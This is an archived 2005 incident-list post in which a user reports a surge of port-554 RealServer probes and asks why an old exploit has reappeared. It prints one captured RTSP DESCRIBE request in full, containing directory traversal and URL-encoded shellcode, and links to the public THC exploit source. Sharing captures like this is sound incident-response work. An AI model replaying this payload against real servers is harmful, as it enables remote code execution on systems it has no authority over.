THC's RealServer (port 554) exploit?

From: Stefan Pettersson (stefan.pets_at_home.se)
Date: 02/16/05

  • Next message: Collin: "Re: New MSN worm?"
    Date: Wed, 16 Feb 2005 17:53:07 +0100
    To: incidents@securityfocus.com
    
    

    Hi, I'm kinda new in this field so, please bear with me.

    I've got a massive increase on connection requests to port 554 (RealServer) this
    afternoon. I haven't given much thought about earlier connections but when looking
    through the firewall log I see that I've gotten a few in the past as well. There is
    however no doubt that the traffic has increased _greatly_ this afternoon. (Almost)
    every attempt are sent by a different address. I don't know if these are decoys
    though.

    I was curious about this so I opened the port up and ran

    nc -l -p 554 > output

    to see what the probes tried to send. What I got was definately an exploit attempt.

    DESCRIBE /../../../../ΜΜ%eb%15%b9%8b%e6%13%41%81%f1%39%e6%13%41%5e%80%74%31%ff%9e%e2%f9%eb%05%e8%e6%ff%ff%ff%ad%45%fa%15%dd%ae%15%de%92%15%ee%82%33%15%e6%96%76%db%9e%9e%9e%cd%c8%15%c1%a2%15%c2%a5%e6%9d%41%cd%15%c5%be%9d%41%cd%1d%5d%9a%15%ad%9d%69%ad%57%32%ac%56%5f%5f%9b%1a%5e%eb%68%b5%54%eb%77%c6%b5%46%4f%75%c0%9d%c0%ba%9d%41%f8%15%95%15%c0%82%9d%41%15%9a%15%9d%59%c0%c5%61%7e%c0%f6%ad%ac%9e%9e%f6%e9%ed%ac%c1%ca%24%0c%f0%9a%1a%61%48%15%66%1f%72%9e%9c%9e%9e%15%72%cd%f4%9f%f4%9c%24%1d%cd%1d%9e%61%48%cd%cd%f6%4d%43%8d%24%f6%9c%9e%7e%ec%15%4a%15%46%f4%8e%cc%cd%24%fd%ae%fe%c4%61%48%ce%2a%9c%ce%cb%cd%24%9e%c6%fe%7c%61%48%21%a3%36%27%f3%61%7b.smi RTSP/1.0

    I removed a "few" /../..

    Searching the web for this and found that this is an old exploit, most likely this
    one:

    http://www.thc.org/exploits/THCrealbad.c

    But that one is almost two years old, why does it show up this much now? So suddenly.
    It has only been going on for a few hours. Is there something new that has come out
    or is it just a coincidence?

    Regards,
    Stefan Pettersson


  • Next message: Collin: "Re: New MSN worm?"